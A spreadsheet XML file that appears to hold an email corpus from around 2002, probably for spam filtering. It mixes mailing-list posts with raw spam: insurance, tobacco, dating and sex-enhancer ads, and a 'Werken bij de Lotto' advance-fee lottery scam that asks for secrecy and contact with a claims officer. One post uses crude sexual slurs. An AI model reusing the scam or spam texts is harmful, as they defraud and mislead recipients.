 making!&lt;/font&gt;&lt;/p&gt;
             &lt;p&gt;&lt;font size=3D"2"&gt;Ask us for the LTC Alternatives. We'll =
 give=20
               you multiple carriers and options for your clients.&lt;br&gt;
               &lt;img =
 src=3D"http://iiq.us/images/mando/ltc0710/20020717-2.gif" width=3D"529" =
 height=3D"69" alt=3D"800-862-9133"&gt;&lt;br&gt;
               &amp;#151; or &amp;#151;&lt;/font&gt;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colspan=3D"3"&gt;=20
                           &lt;input type=3D"text" name=3D"contactname" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                         &lt;td rowspan=3D"5" valign=3D"middle" =
 align=3D"center"&gt;&lt;img src=3D"http://iiq.us/images/q.gif" width=3D"43" =
 height=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;E-mail:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;=20
                           &lt;input type=3D"text" name=3D"email" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;=20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&lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt;=20
                           &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;
                         &lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"20%"&gt;=20
                           &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"marketing@mandomarketing.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"M&amp;O Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &amp;nbsp;&lt;br&gt;
             &lt;font size=3D"1"&gt;For agent use only. &lt;/font&gt;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href=3D"http://www.InsuranceIQ.com/optout"&gt;=20
         http://www.InsuranceIQ.com/optout&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;center&gt;
   &lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"1"&gt;&lt;a =
 href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal Notice&lt;/a&gt;&lt;/font&gt;=20
 &lt;/center&gt;
 &lt;/font&gt;=20
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_14AAA3_01C251CD.D3972A00--
</t>
  </si>
  <si>
    <t xml:space="preserve">According to my son, it was actually Homer Simpson, who claimed the 
 French had no word for victory.
 Chuck
 On Thursday, August 22, 2002, at 01:58 PM, Robert Harley wrote:
 &gt; An apparent quote from Dubya, from the Times (sent to me by my Dad):
 &gt;
 &gt; http://www.timesonline.co.uk/printFriendly/0,,1-43-351083,00.html
 &gt;
 &gt; ------------------------------------------------------------------------------
 &gt; TONY BLAIR's special relationship with George W. Bush is under
 &gt; considerable strain. Not only do the two disagree on Yassir Arafat's
 &gt; tenure as leader of the Palestinian Authority, but Blair has started
 &gt; telling disparaging anecdotes about the President.
 &gt;
 &gt; Baroness Williams of Crosby recalled a story told to her by 'my good
 &gt; friend Tony Blair' recently in Brighton. Blair, Bush and Jacques
 &gt; Chirac were discussing economics and, in particular, the decline of
 &gt; the French economy. 'The problem with the French,' Bush confided in
 &gt; Blair, 'is that they don't have a word for entrepreneur.'
 &gt; ------------------------------------------------------------------------------
 &gt;
 &gt; R
 &gt; http://xent.com/mailman/listinfo/fork
 &gt;
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Fwd: Linux Beer Hike
</t>
  </si>
  <si>
    <t xml:space="preserve">Ar mhaith le einne anseo caint le TG4 faoin LBW?
 Donncha.
 ----------  Forwarded Message  ----------
 Subject: Linux Beer Hike
 Date: Tue, 30 Jul 2002 10:00:56 +0100
 From: Diarmaid Mac Mathuna &lt;diarmaid.mac@agtel.ie&gt;
 To: donncha.ocaoimh@tradesignals.com
 A Dhonncha, a chara,
 T m ag danamh taighde don clr teilifse An Tuath Nua (a bhonn 
 chraoladh ar TG4) faoi lthair, agus chonaic m go mbedih an Linux Beer
 Hike ar sil i Doolin i mbliana. Bheadh spis againn mr a dhanamh mar
 gheall ar an Hike ar an gclr - an mbeidh t fin n aon duine eile le
 Gaeilge ar an Hike go bhfios duit?
 Go raibh maith agat as do chabhair,
 Sln,
 Diarmaid
 _________________________
 Diarmaid Mac Mathna
 Agtel
 37-39 Fitzwilliam Square, Dublin 2
 37-39 Pls Mhic Liam, Baile tha Cliath 2
 Phone / Fn: (01) 605 3737 / (086) 880 4187
 Fax / Facs:  (01) 676 6137
 e-mail / r-phost: diarmaid.mac@agtel.ie
 web / idirlon:   www.agtel.ie
 -------------------------------------------------------
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 8 Sep 2002, Eugen Leitl wrote:
 --]doesn't look particularly difficult to do.
 --]
 --]Clearly this is not something what hets do, prostitution not taken into
 --]account.
 So lets see, hets dont go to swing clubs, meat markets or the like at all?
 Hmm. And being gay means hanging in the bath house being a cum dumpster
 while you listen to the Devine Ms M belt one out for the boys?
 Ugh, with thinking like this who needs the bible belt?
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Half Price Cigarettes and Tobacco
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Dear Sir or Madam
 In the past you have requested information on discounted products. We hope that you find this of interest. If you are not a smoker, and find this email offensive, we sincerely apologise!  We will be only too happy to take you off our mailing list.
 If you are a smoker, however, and are fed up with paying high prices for your cigarettes and tobacco, take a look at what we have to offer  by clicking on this link.
 http://www.smokersunited.co.uk/?S=15&amp;ID=2
 We can send you, legally, by registered air mail, direct to your door, 4 cartons of cigarettes or 40 pouches of rolling tobacco (all brands are available) from only 170 Euros - about 105 pounds - fully inclusive of postage and packing.  Why pay more?
 To remove yourself from our mailing list, please click below
 mailto:smokersclub@terra.es
 Yours faithfully.
 Smokers United
 http://www.smokersunited.co.uk/?S=15&amp;ID=2
 xay1y
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] AWARD NOTIFICATION
</t>
  </si>
  <si>
    <t xml:space="preserve">WERKEN BIJ DE LOTTO,
 41132, NL-1007 DB AMSTERDAM,
 THE NETHERLANDS.
 FROM: THE DESK OF THE DIRECTOR PROMOTIONS,
 INTERNATIONAL PROMOTIONS/PRIZE AWARD DEPARTMENT,
 REF: WBL/67-B773524441
 ATTN:
 	AWARD NOTIFICATION; FINAL NOTICE
 We are pleased to inform you of the announcement
 today, 17 th  SEPT.  2002, of 
 winners of the WERKEN BIJ DE LOTTO/ INTERNATIONAL
 PROGRAMS held on 5TH JulY 2002.
 You / your company, attached to ticket number
 013-2316-2002-477, with serial 
 number A025-09 drew the lucky numbers
 37-13-34-85-56-42, and consequently won in 
 category C.
 You have therefore been approved for a lump sum pay
 out of US$1,500,000.00 in 
 cash credited to file REF NO. REF:
 WBL/67-B773524441. This is from total prize 
 money of US$22,500,000.00 shared among the fifteen
 international winners in the 
 category C. All participants were selected through a
 computer ballot system 
 drawn from 30,000 names from Australia, New Zealand,
 America, Asia, Europe and 
 North America as part our
 International Promotions Program, which is conducted
 annually.
 CONGRATULATIONS!
 Your fund is now deposited with a Finance and
 Security House and insured in 
 your name. Due to the mix up of some numbers and
 names, we ask that you keep this 
 award strictly from public notice until your claim
 has been processed and your 
 money remitted to your account. This is part of our
 security protocol to avoid 
 double claiming or unscrupulous acts by participants
 of this program.
 We hope with a part of you prize, you will
 participate in our end of year high 
 stakes US$1.3 billion International lotto.
 To begin your claim, please contact your claims
 officer immediately:
 JANSEN DAVIS
 FOREIGN SERVICE MANAGER,
 EUROLITE BV,
 TEL: 31 205241510    
 FAX: 31 205241590
 EMAIL:eurolitebv1@theoffice.net
 For due processing and remittance of your prize
 money to a designated account 
 of your choice. Remember, you must contact your
 claims officer not later than 
 SEPTEMBER 27 th, 2002. After this date, all funds
 will be returned as unclaimed.
 NOTE: In order to avoid unnecessary delays and
 complications, please remember 
 to quote your reference number in every one of your
 correspondences with your 
 officer. Furthermore, should there be any change of
 your address, do inform your 
 claims officer as soon as possible.
 Congratulations again from all our staff and thank
 you for being part of our 
 promotions program.
 Sincerely,
 THE DIRECTOR PROMOTIONS,
 WERKEN BIJ DE LOTTO.
 www.werken-bij-delotto.net
 N.B. Any breach of confidentiality on the part of
 the winners will result to 
 disqualification. Please do not reply this mail.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: English Well for you?
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Hallo,
 I found yours Email ID in Directoric.
 I have been from Russian and for a man like you have I been lookink.
 http://www.easygoingcompanion.com/?oc=6120
 .If you no want to hear from me again just reply and i no bother you again
 **
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: MEN &amp; WOMEN, SPRUCE UP YOUR SEX LIFE!             GDOZ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</si>
  <si>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&lt;title&gt;Vigoral Ad&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;div align=3D"center"&gt;
   &lt;center&gt;
   &lt;table border=3D"0" width=3D"54%" height=3D"393"&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%" height=3D"387"&gt;
 &lt;div align=3D"center"&gt;
   &lt;table border=3D"0" width=3D"98%" height=3D"79" bgcolor=3D"#FFFF99"&gt;
     &lt;tr&gt;
       &lt;th width=3D"71%" height=3D"73" align=3D"center"&gt;&lt;font size=3D"3" co=
 lor=3D"#FF0000"&gt;&lt;b&gt;Vigoral Herbal Sex Enhancers&lt;/b&gt;&lt;/font&gt;&lt;br&gt;&lt;b&gt;&lt;font fac=
 e=3D"Times New Roman" color=3D"#FF0000" size=3D"3"&gt;Direct from
         the lab to you!&lt;/font&gt;&lt;/b&gt;&lt;br&gt;&lt;b&gt;&lt;font face=3D"Tahoma" size=3D"2" =
 color=3D"#0066FF"&gt;We
         are Now Offering 3 Unique Products to help increase your moments w=
 ith
         that special someone @ &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"2" col=
 or=3D"#FF0000"&gt;Only
         $24.99 each!!!&lt;/font&gt;&lt;/b&gt;&lt;/th&gt;
       &lt;th width=3D"29%" height=3D"73" align=3D"center"&gt;&lt;a href=3D"http://w=
 ww.medievalmedia.com/"&gt;&lt;img border=3D"0" src=3D"http://www.polwas.com/0025=
 /freeshipping1.gif" width=3D"160" height=3D"80"&gt;&lt;/a&gt;&lt;/th&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;
 &lt;div align=3D"center"&gt;
   &lt;table border=3D"0" width=3D"59%" height=3D"351"&gt;
     &lt;tr&gt;
       &lt;td width=3D"88%" height=3D"88" align=3D"center" bordercolor=3D"#FFF=
 F99" style=3D"border: 1 solid #FFFF99" bordercolorlight=3D"#FFFF99" border=
 colordark=3D"#FFFF99"&gt;&lt;a href=3D"http://www.medievalmedia.com/"&gt;&lt;img borde=
 r=3D"0" src=3D"http://www.polwas.com/0025/SUPER.jpg" width=3D"138" height=3D=
 "72"&gt;&lt;/a&gt;&lt;/td&gt;
       &lt;td width=3D"80%" height=3D"88" align=3D"center" bordercolor=3D"#FFF=
 F99" style=3D"border: 1 solid #FFFF99" bordercolorlight=3D"#FFFF99" border=
 colordark=3D"#FFFF99"&gt;&lt;a href=3D"http://www.medievalmedia.com/"&gt;&lt;img borde=
 r=3D"0" src=3D"http://www.polwas.com/0025/SUPERb.jpg" width=3D"139" height=
 =3D"72"&gt;&lt;/a&gt;&lt;/td&gt;
       &lt;td width=3D"191%" height=3D"88" align=3D"center" bordercolor=3D"#FF=
 FF99" style=3D"border: 1 solid #FFFF99" bordercolorlight=3D"#FFFF99" borde=
 rcolordark=3D"#FFFF99"&gt;&lt;a href=3D"http://www.medievalmedia.com/"&gt;&lt;img bord=
 er=3D"0" src=3D"http://www.polwas.com/0025/SUPERv.jpg" width=3D"163" heigh=
 t=3D"72"&gt;&lt;/a&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width=3D"116%" height=3D"170" align=3D"center" bgcolor=3D"#FFFF9=
 9" style=3D"border: 1 solid #FFFF99"&gt;&lt;a href=3D"http://www.medievalmedia.c=
 om/"&gt;&lt;img border=3D"0" src=3D"http://www.polwas.com/0025/supervigoral.jpg"=
  width=3D"91" height=3D"158"&gt;&lt;/a&gt;&lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial" size=3D"2" co=
 lor=3D"#0066FF"&gt;Only
         $24.99 ea!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width=3D"125%" height=3D"170" align=3D"center" bgcolor=3D"#FFFF9=
 9" style=3D"border: 1 solid #FFFF99"&gt;&lt;a href=3D"http://www.medievalmedia.c=
 om/"&gt;&lt;img border=3D"0" src=3D"http://www.polwas.com/0025/vigorgel.jpg" wid=
 th=3D"90" height=3D"160"&gt;&lt;/a&gt;&lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial" size=3D"2" color=3D=
 "#0066FF"&gt;Only
         $24.99 ea!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width=3D"191%" height=3D"170" align=3D"center" bgcolor=3D"#FFFF9=
 9" style=3D"border: 1 solid #FFFF99"&gt;&lt;a href=3D"http://www.medievalmedia.c=
 om/"&gt;&lt;img border=3D"0" src=3D"http://www.polwas.com/0025/vigorette.jpg" wi=
 dth=3D"98" height=3D"159"&gt;&lt;/a&gt;&lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial" size=3D"2" color=
 =3D"#0066FF"&gt;Only
         $24.99 ea!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width=3D"116%" height=3D"87" style=3D"color: #FF0000; font-famil=
 y: Tahoma; border: 1 solid #FFFF99" bgcolor=3D"#FFFF99" align=3D"center"&gt;M=
 en,
         Increase Your Energy Level &amp;amp; Maintain Stronger Erections!&lt;/td&gt;
       &lt;td width=3D"125%" height=3D"87" style=3D"color: #FF0000; font-famil=
 y: Tahoma; border: 1 solid #FFFF99" bgcolor=3D"#FFFF99" align=3D"center"&gt;E=
 dible,
         Specially Formulated Lubricant For Everyone!&lt;/td&gt;
       &lt;td width=3D"191%" height=3D"87" style=3D"color: #FF0000; font-famil=
 y: Tahoma; border: 1 solid #FFFF99" bgcolor=3D"#FFFF99" align=3D"center"&gt;W=
 omen,
         Heighten Your Sexual Desire &amp;amp; Increase Your Sexual Climax!&lt;/td=
 &gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;
         &lt;div align=3D"center"&gt;
           &lt;table border=3D"0" width=3D"99%" height=3D"44" bgcolor=3D"#FF00=
 00"&gt;
             &lt;tr&gt;
               &lt;td width=3D"100%" height=3D"38" align=3D"center" bordercolo=
 r=3D"#FFFF99" style=3D"border: 1 solid #FFFF99"&gt;&lt;b&gt;&lt;font color=3D"#FFFF99"=
  size=3D"5" face=3D"Tahoma"&gt;&lt;a href=3D"http://www.medievalmedia.com/" styl=
 e=3D"color: #FFFF99; font-size: 14pt; font-weight: bold"&gt;CLICK
                 HERE to Get it While it's HOT!&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
         &lt;/div&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;div align=3D"center"&gt;
   &lt;center&gt;
   &lt;table border=3D"0" width=3D"54%" height=3D"99"&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%" height=3D"93" align=3D"center"&gt;&lt;font face=3D"Verd=
 ana" color=3D"#000000" size=3D"1"&gt;You
         are receiving this special offer because you have provided permiss=
 ion to
         receive email communications regarding special online promotions o=
 r
         offers. If you feel you have received this message in error, or wi=
 sh to
         be removed from our subscriber list, &lt;a style=3D"COLOR: #ff0000" h=
 ref=3D"mailto:print5@btamail.net.cn?Subject=3DUNSUBSCRIBE"&gt;Click
         HERE&lt;/a&gt; and you will be removed within less than three business d=
 ays.
         Thank You and sorry for any inconvenience.&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Accessibility watershed?
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/06.html#accessibility_watershed
 Date: 2002-10-06T23:41:43-05:00
 _Law.com_: Suit Over Airlines' Web Sites Tests Bounds of ADA[1]. [via Slashdot: 
 Blind User Sues Southwest Over Web Site, Cites ADA[2]] 
     Gumson and a Miami Beach, Fla.- based disability rights group, Access Now, 
     filed lawsuits in U.S. District Court in Miami in June and July against 
     Dallas- based Southwest and Dallas-based American Airlines under the 
     Americans with Disabilities Act. They are doing so under an untested legal 
     theory. Namely, that ADA provisions on the accessibility of public 
     accommodations to the disabled apply to Internet Web sites just as they do 
     to brick-and-mortar facilities like movie theaters and department stores. 
 Five months ago, I said[3] &amp;#8220;within the next 12 months, all web authoring 
 tools will fully embrace CSS, accessibility, and web standards. And I mean 
 fully, inside and out, as Macromedia appears to have done here [with 
 Dreamweaver MX]. Those tools that do not will simply fall by the wayside. This 
 is the new baseline.&amp;#8221; Seven months to go on that prediction. Tick tock, 
 tick tock...
 [1] http://www.law.com/servlet/ContentServer?pagename=OpenMarket/Xcelerate/View&amp;c=LawArticle&amp;cid=1032128683422&amp;t=LawArticleTech
 [2] http://slashdot.org/article.pl?sid=02/10/06/2340204
 [3] http://diveintomark.org/archives/2002/05/02.html#the_new_baseline
     dive into mark, May 2, 2002: 
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 28 Aug 2002, Matthew Cline wrote:
 &gt; There must be *some* way of tracking a spammer down, since they are
 &gt; planning on making money from the spam.
 Many spammers make money not from response to the spam, but from selling
 the service of spamming on behalf of someone else.  You might track down
 whoever paid for the mailing, but tracking down the actual sender might be
 more difficult, and even if they manage to recover damages from the buyer
 they haven't stopped the spammer, so the benefit is strictly to Habeas,
 not to the recipients of the spam.  That's the main problem I have with
 the whole scenario: My pain, Habeas's gain, and those most likely to be
 held liable are those least likely to be the really serious abusers.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</si>
  <si>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Quoting Nick Murtagh (nickm@go2.ie):
 &gt; On Mon, 2002-08-12 at 19:26, Rick Moen wrote:
 &gt;
 &gt;&gt; NON-freely redistributable apps (in boxed sets):
 &gt;&gt; -----------------------------------------------
 &gt;&gt; SAP database
 &gt; 
 &gt; The same one as provided on www.sapdb.org? 
 &gt; Which is released under the GPL/LGPL?
 Looking at http://www.sapdb.org/history.htm , it seems that SAP went
 open-source some time in 2000, so my information likely was correct
 at the time I compiled that list.
 In addition, please note that, just because a company decides to go open
 source with a codebase as of some new release version, that doesn't make
 all versions ever released open source retroactively.  A licence
 attaches to a _copy_ of a creative work.  So, if there was a
 proprietary, non-redistributable copy in SuSE boxed sets, it's still
 proprietary and non-redistributable -- unless SAP AG decided to mail out
 a separate permission grant for it.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;See Jared Diamond's excellent "Guns, Germs, and Steel" for the story.
 Yeah, I know the party line.  The evidence for it is extremely meagre.
 New Worlders had two entire continents and tens of millions of people,
 which is a plenty big enough reservoir for infectious diseases to thrive
 in.  Their records show that they were plagued with them long before 1492.
 Take Ireland in the early 1800s.  Assume a population of circa 8
 million.  Take Ireland around 1900.  Assume a population not much
 above 3 million.  Ignore natural variations between mortality and
 natality.  Omit emigration.  Observe the Great Famine in the middle.
 Deduce that it killed 5 million (actually about 1).  Transpose to 16th
 century Mexico.  Grossly inflate estimates of pre-contact population,
 because nobody has a damn clue what it was anyway.  Underestimate
 later population levels.  Deduce that 10's of millions died.  Lather,
 rinse, repeat.
 R
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --PEIAKu/WMn1b1Hv9
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 &gt; PS I know my English isn't good, but... "negative score added", can
 &gt; you really say that? Adding something negative... hmmm...
 Yes, that is perfectly legitimate.  It is a math / accounting thing.
 You get a paycheck for $100.  You get a bill for $20.  You add them
 up.  Some of the additions are negitive debit amounts.  My bank
 statement always has a long list of + items and - items.  If I can
 keep the + items more than the - items I am doing good.
 Bob
 --PEIAKu/WMn1b1Hv9
 Content-Type: application/pgp-signature
 Content-Disposition: inline
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.7 (GNU/Linux)
 iD8DBQE9PgCf0pRcO8E2ULYRAtnpAJ4j3rke5AmfV6FuJ0rvPvwwkEPWKwCff1CF
 1VPYcaD2pk78qQXEfPMlRqw=
 =Qa5S
 -----END PGP SIGNATURE-----
 --PEIAKu/WMn1b1Hv9--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</si>
  <si>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
     &gt;&gt; &gt; ##Remove: jeremy@alum.mit.edu##
     Tim&gt; Yuck: it got two 0.01's from embedding your email address at the
     Tim&gt; bottom here.
 Which suggests that tagging email addresses in To/CC headers should be
 handled differently than in message bodies?
 Skip
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Keep Your Home Safe
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html;charset=3Diso-8859-1=
 "&gt;
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;html xmlns:v=3D"urn:schemas-microsoft-com:vml"
 xmlns:o=3D"urn:schemas-microsoft-com:office:office"
 xmlns:w=3D"urn:schemas-microsoft-com:office:word"
 xmlns=3D"http://www.w3.org/TR/REC-html40"&gt;
 &lt;head&gt;
 &lt;meta http-equiv=3DContent-Type content=3D"text/html; charset=3Diso-8859-1=
 "&gt;
 &lt;meta name=3DProgId content=3DWord.Document&gt;
 &lt;meta name=3DGenerator content=3D"Microsoft Word 9"&gt;
 &lt;meta name=3DOriginator content=3D"Microsoft Word 9"&gt;
 &lt;link rel=3DFile-List href=3D"./Alarms,%20New%20Hours_files/filelist.xml"&gt;
 &lt;title&gt;Alarms, New Hours .htm&lt;/title&gt;
 &lt;!--[if gte mso 9]&gt;&lt;xml&gt;
  &lt;o:DocumentProperties&gt;
   &lt;o:Author&gt;TGSWEL&lt;/o:Author&gt;
   &lt;o:LastAuthor&gt;TGSWEL&lt;/o:LastAuthor&gt;
   &lt;o:Revision&gt;2&lt;/o:Revision&gt;
   &lt;o:TotalTime&gt;8&lt;/o:TotalTime&gt;
   &lt;o:Created&gt;2002-05-11T16:41:00Z&lt;/o:Created&gt;
   &lt;o:LastSaved&gt;2002-05-11T16:41:00Z&lt;/o:LastSaved&gt;
   &lt;o:Pages&gt;2&lt;/o:Pages&gt;
   &lt;o:Words&gt;415&lt;/o:Words&gt;
   &lt;o:Characters&gt;2370&lt;/o:Characters&gt;
   &lt;o:Company&gt;WCS&lt;/o:Company&gt;
   &lt;o:Lines&gt;19&lt;/o:Lines&gt;
   &lt;o:Paragraphs&gt;4&lt;/o:Paragraphs&gt;
   &lt;o:CharactersWithSpaces&gt;2910&lt;/o:CharactersWithSpaces&gt;
   &lt;o:Version&gt;9.4402&lt;/o:Version&gt;
  &lt;/o:DocumentProperties&gt;
 &lt;/xml&gt;&lt;![endif]--&gt;
 &lt;style&gt;
 &lt;!--
  /* Style Definitions */
 p.MsoNormal, li.MsoNormal, div.MsoNormal
 	{mso-style-parent:"";
 	margin:0in;
 	margin-bottom:.0001pt;
 	mso-pagination:widow-orphan;
 	font-size:12.0pt;
 	font-family:"Times New Roman";
 	mso-fareast-font-family:"Times New Roman";}
 p
 	{font-size:12.0pt;
 	font-family:"Times New Roman";
 	mso-fareast-font-family:"Times New Roman";}
 @page Section1
 	{size:8.5in 11.0in;
 	margin:1.0in 1.25in 1.0in 1.25in;
 	mso-header-margin:.5in;
 	mso-footer-margin:.5in;
 	mso-paper-source:0;}
 div.Section1
 	{page:Section1;}
 --&gt;
 &lt;/style&gt;
 &lt;!--[if gte mso 9]&gt;&lt;xml&gt;
  &lt;o:shapedefaults v:ext=3D"edit" spidmax=3D"1027"/&gt;
 &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
  &lt;o:shapelayout v:ext=3D"edit"&gt;
   &lt;o:idmap v:ext=3D"edit" data=3D"1"/&gt;
  &lt;/o:shapelayout&gt;&lt;/xml&gt;&lt;![endif]--&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3Dwhite lang=3DEN-US style=3D'tab-interval:.5in'&gt;
 &lt;div class=3DSection1&gt;
 &lt;p class=3DMsoNormal&gt;&amp;nbsp;&lt;/p&gt;
 &lt;div align=3Dcenter&gt;
 &lt;table border=3D0 cellspacing=3D0 cellpadding=3D0 width=3D"85%" bgcolor=3D=
 "#00125e"
  style=3D'width:85.0%;mso-cellspacing:0in;background:#00125E;mso-padding-a=
 lt:
  0in 0in 0in 0in'&gt;
  &lt;tr&gt;
   &lt;td width=3D"100%" style=3D'width:100.0%;padding:0in 0in 0in 0in'&gt;
   &lt;p align=3Dcenter style=3D'text-align:center'&gt;&lt;b&gt;&lt;span style=3D'font-siz=
 e:36.0pt;
   font-family:Arial;color:red'&gt;U.S. HOMEOWNERS&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
   &lt;p align=3Dcenter style=3D'text-align:center'&gt;&lt;b&gt;&lt;span style=3D'font-siz=
 e:18.0pt;
   color:white'&gt;CALL TODAY TO QUALIFY FOR &lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
   &lt;p align=3Dcenter style=3D'text-align:center'&gt;&lt;b&gt;&lt;span style=3D'font-siz=
 e:18.0pt;
   color:white'&gt;A FREE HOME SECURITY SYSTEM&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
   &lt;p align=3Dcenter style=3D'text-align:center'&gt;&lt;b&gt;&lt;span style=3D'font-siz=
 e:36.0pt;
   color:red'&gt;1-800-775-0738&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
   &lt;p&gt;&amp;nbsp;&lt;/p&gt;
   &lt;/td&gt;
  &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/div&gt;
 &lt;p class=3DMsoNormal align=3Dcenter style=3D'text-align:center'&gt;&lt;span
 style=3D'color:black;display:none;mso-hide:all'&gt;&lt;![if !supportEmptyParas]&gt;=
 &amp;nbsp;&lt;![endif]&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;
 &lt;div align=3Dcenter&gt;
 &lt;table border=3D0 cellspacing=3D0 cellpadding=3D0 width=3D"85%" style=3D'w=
 idth:85.0%;
  mso-cellspacing:0in;mso-padding-alt:0in 0in 0in 0in'&gt;
  &lt;tr&gt;
   &lt;td width=3D"19%" style=3D'width:19.0%;background:#00125E;padding:0in 0i=
 n 0in 0in'&gt;
   &lt;p class=3DMsoNormal&gt;&amp;nbsp;&lt;/p&gt;
   &lt;/td&gt;
   &lt;td width=3D"39%" style=3D'width:39.0%;padding:0in 0in 0in 0in'&gt;
   &lt;p align=3Dcenter style=3D'text-align:center'&gt;&lt;b&gt;&lt;span style=3D'font-fam=
 ily:Arial;
   color:#BC2F0E'&gt;America's most trusted&lt;/span&gt;&lt;/b&gt; &lt;/p&gt;
   &lt;p align=3Dcenter style=3D'text-align:center'&gt;&lt;b&gt;&lt;span style=3D'font-fam=
 ily:Arial;
   color:#BC2F0E'&gt;security system... &lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
   &lt;p align=3Dcenter style=3D'text-align:center'&gt;&lt;b&gt;&lt;span style=3D'font-fam=
 ily:Arial;
   color:#BC2F0E'&gt;The most &lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
   &lt;p align=3Dcenter style=3D'text-align:center'&gt;&lt;b&gt;&lt;span style=3D'font-fam=
 ily:Arial;
   color:#BC2F0E'&gt;comprehensive &lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
   &lt;p align=3Dcenter style=3D'text-align:center'&gt;&lt;b&gt;&lt;span style=3D'font-fam=
 ily:Arial;
   color:#BC2F0E'&gt;security package &lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
   &lt;p align=3Dcenter style=3D'text-align:center'&gt;&lt;b&gt;&lt;span style=3D'font-fam=
 ily:Arial;
   color:#BC2F0E'&gt;ever offered FREE!&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
   &lt;/td&gt;
   &lt;td width=3D"42%" style=3D'width:42.0%;padding:0in 0in 0in 0in'&gt;
